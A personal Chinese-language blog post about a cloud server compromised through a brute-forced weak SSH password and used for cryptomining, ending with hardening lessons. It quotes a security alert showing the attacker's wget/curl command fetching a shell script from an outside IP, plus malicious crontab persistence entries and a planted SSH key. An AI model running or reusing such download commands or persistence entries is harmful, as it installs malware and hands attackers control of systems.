記錄一次雲主機被攻擊掛惡意代碼挖礦的事件

因爲ECS使用了有規律的弱密碼被SSH暴力破解（非22端口）

阿里雲提示被入侵且執行了惡意代碼，安全中心可處理。

相關資料： https://bbs.pediy.com/thread-251753.htm

https://zhuanlan.zhihu.com/p/111351235

但至次日凌晨時，依舊報警。

父進程路徑：/usr/bin/perl

父進程命令行：rsync

父進程id：12354

進程id：12355

用戶名：root

URL連接：http://45.55.129.23/tddwrt7s.sh

進程路徑：/usr/bin/bash

命令行參數：sh -c wget -q http://45.55.129.23/tddwrt7s.sh || curl -s -O -f http://45.55.129.23/tddwrt7s.sh 2>&1 3>&1

與該URL有關聯的漏洞：None

事件說明：雲盾檢測到您的服務器正在嘗試訪問一個可疑惡意下載源，多是黑客經過指令從遠程服務器下載惡意文件，危害服務器安全。若是該指令不是您本身運行，請及時排查入侵緣由，例如查看本機的計劃任務、發起對外鏈接的父子進程。

解決方案：請及時排查告警中提示的惡意URL，以及所下載的目錄下的惡意文件，並及時清理已運行的惡意進程。若是該指令是您本身主動執行的，您能夠在控制檯點擊標記爲誤報。

 

------------------------------------

後排查rsync進程目錄下有可疑目錄，進行了清除。

lrwxrwxrwx 1 root root 0 Mar 19 01:36 cwd -> /dev/shm/.tddddddddd

 

繼續排查了定時計劃

[root@izbp168lretu4toy79p12kz ~]# crontab -l
* */2 * * * /root/.bashtemprc/a/upd>/dev/null 2>&1
@reboot /root/.bashtemprc/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.bashtemprc/b/sync>/dev/null 2>&1
@reboot /root/.bashtemprc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X19-unix/.rsync/c/aptitude>/dev/null 2>&1

 

依舊存在可疑目錄，刪除

 

後續發如今/root/.ssh目錄中中被植入了黑客的公鑰文件authorized_keys， 能夠被免密碼登陸SSH了。。。

--------------------

吸收些教訓：

1.切不可用有規律的密碼

2.按期檢查系統定時任務是否有可疑的任務

3.按期檢查/root/.ssh是否被替換了可疑的公鑰